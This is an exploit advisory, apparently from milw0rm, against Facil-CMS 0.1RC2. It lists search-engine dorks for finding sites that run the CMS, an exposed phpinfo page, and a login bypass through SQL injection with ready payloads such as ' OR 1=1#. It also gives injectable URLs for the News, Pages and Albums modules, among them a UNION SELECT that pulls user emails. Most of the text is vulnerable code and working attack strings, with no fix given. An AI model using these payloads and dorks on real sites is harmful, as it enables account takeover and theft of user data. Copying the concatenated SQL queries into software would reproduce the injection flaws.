[Script]
Facil-CMS 0.1RC2
+download: http://sourceforge.net/project/platformdownload.php?group_id=217673
[DORK]
inurl:modules.php?modload=News
Copyright (C) 2008 by FacilCMS.org
inurl: /facil-cms/
[Author]
any.zicky
[Contact Me]
any__dot__zicky__at__gmail__dot__com ;)
[About]
Facil CMS is a Free and Open Source Project for your site Content Management System (CMS). Facil CMS uses PHP 5 and connect to many database systens. Facil CMS is Easy to create and modify modules for your system and Support Theme Templates.
[Other bug in project]
http://www.milw0rm.com/exploits/5792
[Bugs]
1) we can see phpinfo() in root_path project
+Example: http://localhost/phpinfo.php
2) Auth bypass
let's see login.php code
[CODE]
...
if($_POST['email'] && $_POST['password'])
{
...
$email = $_POST['email'];
$password = md5($_POST['password']);
$user = new Users();
$login = $user->Login($email, $password); <-------------
if($login && !is_null($login) && !empty($login))
{
$user = new Users($login);
...
[/CODE]
then let look /facil-cms/modules/Users/class/Users.mysql.class.php code
[CODE]
...
function Login($email, $password)
{
$sql = "SELECT * FROM " . _USERS_DB_TABLE_ . " WHERE email='" . $email . "' AND password='" . $password . "'"; <----------
$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql);
if($res->RecordCount() == 1)
{
return $res->fields('id');
}
}
...
[/CODE]
+Example: http://locahost/index.php?modload=User
Email: admin@facilcms.org'#
pass: blaaaaa
Email: ' OR 1=1#
pass: blaaaaa
3) SQL-INj in News modules
Let look /facil-cms/modules/News/class/News.mysql.class.php code
[CODE]
...
function getNewInfo($id)
{
$sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $id; <----------------
$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql);
if($res->RecordCount() == 1)
{
$this->setContent($res->fields('content'));
$this->setDate($res->fields('date'));
$this->setId($res->fields('id'));
$this->setLanguage($res->fields('language'));
$this->setPublisher($res->fields('publisher'));
$this->setResume($res->fields('resume'));
$this->setStatus($res->fields('status'));
$this->setTitle($res->fields('title'));
return true;
}
}
...
[/CODE]
+Example: http://localhost/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#
4) SQL-Inj in Pages modules
Let look /facil-cms/modules/Pages/class/Pages.mysql.class.php code
[CODE]
...
function getPageInfo($id)
{
$sql = "SELECT * FROM " . _PAGES_DB_TABLE_ . " WHERE id=" . $id; <------------------
$res = $GLOBALS['DB']->Execute($sql);
if($res->RecordCount() == 1)
{
$this->setActive($res->fields('active'));
$this->setContent($res->fields('content'));
$this->setId($res->fields('id'));
$this->setLanguage($res->fields('language'));
$this->setTitle($res->fields('title'));
return true;
}
}
...
[/CODE]
+Example: http://localhost/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*
5) SQL-inj in ALbums module
Let look /facil-cms/modules/Albums/class/Photos.mysql.class.php code
[CODE]
...
function getPhotoInfo($id)
{
$sql = "SELECT * FROM " . _PHOTOS_DB_TABLE_ . " WHERE id=" . $id; <--------------------
$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql);
if($res->RecordCount() == 1)
{
$this->setId($res->fields('id'));
$this->setAlbum($res->fields('album'));
$this->setFile($res->fields('file'));
$this->setComment($res->fields('comment'));
return true;
}
}
...
[/CODE]
+Example: http://localhost/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/*
# milw0rm.com [2009-03-18]